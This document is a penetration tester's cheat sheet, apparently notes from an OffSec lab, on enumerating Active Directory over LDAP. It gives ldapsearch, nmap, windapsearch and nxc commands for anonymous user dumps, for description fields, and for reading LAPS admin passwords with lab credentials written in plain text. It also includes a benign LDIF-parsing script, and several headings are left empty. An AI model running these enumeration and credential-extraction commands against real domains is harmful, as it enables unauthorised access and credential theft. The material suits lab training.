Enumerating AD

LDAP (389, 636, 3268, 3269)

# Scan for LDAP service & version
nmap -n -sV --script "ldap*" hutch.offsec

# Extract sAMAccountName (anonymous bind) and save to users.txt
ldapsearch -x -H ldap://target -D '' -w '' -b "DC=,DC=" | grep sAMAccountName: | awk -F: '{print $2}' | tr -d " " > users.txt

# Find LDAP entries with a description
ldapsearch -x -H ldap://target -D '' -w '' -b "DC=,DC=" | grep description:

# All user objects (the filter also matches computer accounts, which are objectClass=user)
ldapsearch -x -H ldap://target -D "CN=web_svc,CN=Users,DC=dc,DC=dc" -w Password1 -b "DC=dc,DC=dc" "(objectClass=user)"

ldapsearch -h IP -x -b "DC=,DC=" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "

# Dump all LDAP entries using creds
ldapsearch -x -H ldap://target -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b "DC=hutch,DC=offsec"

# Extract ms-MCS-AdmPwd (LAPS local admin password, readable only if the bound user has rights to the attribute)
ldapsearch -x -H ldap://target -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b "DC=hutch,DC=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

# windapsearch
windapsearch --dc-ip IP -u "" -U

# nxc
nxc ldap IP -u user -p pass
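Added here as an example (not part of the original notes): a small LDIF parser that handles the two cases the `grep sAMAccountName: | awk` pipeline above misses, folded continuation lines and base64-encoded (`::`) values, so an exported ldapsearch dump can be reviewed for accounts with populated description fields (a common place stale credentials turn up). The sample LDIF, account names and description text are constructed.

```python
import base64
# Constructed sample ldapsearch (LDIF) output, not from a real domain. It has a
# folded line (continuation starts with one space) and a base64 value ("::"),
# both of which the grep/awk pipeline above silently mishandles.
SAMPLE_LDIF = """\
dn: CN=Alice Example,CN=Users,DC=example,DC=local
objectClass: user
sAMAccountName: alice
description: Temporary account, remove after migration of the file server to
  the new cluster

dn: CN=svc backup,CN=Users,DC=example,DC=local
objectClass: user
sAMAccountName: svc_backup
description:: U2VydmljZSBhY2NvdW50IC0gcmV2aWV3IGFubnVhbGx5

# search result
result: 0 Success
"""

def parse_ldif(text):
    """Parse LDIF into a list of {attribute: [values]} dicts, one per entry."""
    lines = []
    for raw in text.splitlines():  # unfold continuation lines first
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:  # trailing "" flushes the last entry
        if not line:
            if "dn" in current:  # skip the "result:" trailer and comment-only blocks
                entries.append(current)
            current = {}
        elif not line.startswith("#"):
            attr, _, rest = line.partition(":")
            if rest.startswith(":"):  # "attr:: value" means base64-encoded
                value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
            else:
                value = rest.strip()
            current.setdefault(attr, []).append(value)
    return entries

def sam_account_names(entries):
    return [e["sAMAccountName"][0] for e in entries if "sAMAccountName" in e]

def populated_descriptions(entries):
    # sAMAccountName -> description for every account that has one (review target)
    return {e["sAMAccountName"][0]: e["description"][0]
            for e in entries if "sAMAccountName" in e and "description" in e}
```

Feed it the output of any of the ldapsearch commands above (redirected to a file) instead of SAMPLE_LDIF to get the same account list and description map from a real export.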

Enumerate Users

Users and Groups

OS

Users and Perms

SPNs

Object Permissions

Domain Shares

Shares often contain info about the environment

Bloodhound
